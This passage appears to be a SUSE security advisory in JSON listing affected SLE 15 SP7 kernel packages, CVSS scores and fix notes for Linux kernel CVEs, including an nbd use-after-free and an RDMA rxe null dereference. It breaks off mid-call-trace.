"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68367"
},
{
"cve": "CVE-2025-68372",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68372"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config put in recv_work\n\nThere is one uaf issue in recv_work when running NBD_CLEAR_SOCK and\nNBD_CMD_RECONFIGURE:\n nbd_genl_connect // conf_ref=2 (connect and recv_work A)\n nbd_open\t // conf_ref=3\n recv_work A done // conf_ref=2\n NBD_CLEAR_SOCK // conf_ref=1\n nbd_genl_reconfigure // conf_ref=2 (trigger recv_work B)\n close nbd\t // conf_ref=1\n recv_work B\n config_put // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nOr only running NBD_CLEAR_SOCK:\n nbd_genl_connect // conf_ref=2\n nbd_open \t // conf_ref=3\n NBD_CLEAR_SOCK // conf_ref=2\n close nbd\n nbd_release\n config_put // conf_ref=1\n recv_work\n config_put \t // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nCommit 87aac3a80af5 (\"nbd: call nbd_config_put() before notifying the\nwaiter\") moved nbd_config_put() to run before waking up the waiter in\nrecv_work, in order to ensure that nbd_start_device_ioctl() would not\nbe woken up while nbd-\u003etask_recv was still uncleared.\n\nHowever, in nbd_start_device_ioctl(), after being woken up it explicitly\ncalls flush_workqueue() to make sure all current works are finished.\nTherefore, there is no need to move the config put ahead of the wakeup.\n\nMove nbd_config_put() to the end of recv_work, so that the reference is\nheld for the whole lifetime of the worker thread. This makes sure the\nconfig cannot be freed while recv_work is still running, even if clear\n+ reconfigure interleave.\n\nIn addition, we don\u0027t need to worry about recv_work dropping the last\nnbd_put (which causes deadlock):\n\npath A (netlink with NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=1 (trigger recv_work)\n open nbd // nbd_refs=2\n NBD_CLEAR_SOCK\n close nbd\n nbd_release\n nbd_disconnect_and_put\n flush_workqueue // recv_work done\n nbd_config_put\n nbd_put // nbd_refs=1\n nbd_put // nbd_refs=0\n queue_work\n\npath B (netlink without NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=2 (trigger recv_work)\n open nbd // nbd_refs=3\n NBD_CLEAR_SOCK // conf_refs=2\n close nbd\n nbd_release\n nbd_config_put // conf_refs=1\n nbd_put // nbd_refs=2\n recv_work done // conf_refs=0, nbd_refs=1\n rmmod // nbd_refs=0\n\nDepends-on: e2daec488c57 (\"nbd: Fix hungtask when nbd_config_put\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68372",
"url": "https://www.suse.com/security/cve/CVE-2025-68372"
},
{
"category": "external",
"summary": "SUSE Bug 1255537 for CVE-2025-68372",
"url": "https://bugzilla.suse.com/1255537"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68372"
},
{
"cve": "CVE-2025-68379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure\n\nA NULL pointer dereference can occur in rxe_srq_chk_attr() when\nibv_modify_srq() is invoked twice in succession under certain error\nconditions. The first call may fail in rxe_queue_resize(), which leads\nrxe_srq_from_attr() to set srq-\u003erq.queue = NULL. The second call then\ntriggers a crash (null deref) when accessing\nsrq-\u003erq.queue-\u003ebuf-\u003eindex_mask.\n\nCall Trace:\n\u003cTASK\u003e\nrxe_modify_srq+0x170/0x480 [rdma_rxe]\n? __pfx_rxe_modify_srq+0x10/0x10 [rdma_rxe]\n? uverbs_try_lock_object+0x4f/0xa0 [ib_uverbs]\n? rdma_lookup_get_uobject+0x1f0/0x380 [ib_uverbs]\nib_uverbs_modify_srq+0x204/0x290 [ib_uverbs]\n? __pfx_ib_uverbs_modify_srq+0x10/0x10 [ib_uverbs]\n? tryinc_node_nr_active+0xe6/0x150\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x2c0/0x470 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_run_method+0x55a/0x6e0 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\nib_uverbs_cmd_verbs+0x54d/0x800 [ib_uverbs]\n? __pfx_ib_uverbs_cmd_verbs+0x10/0x10 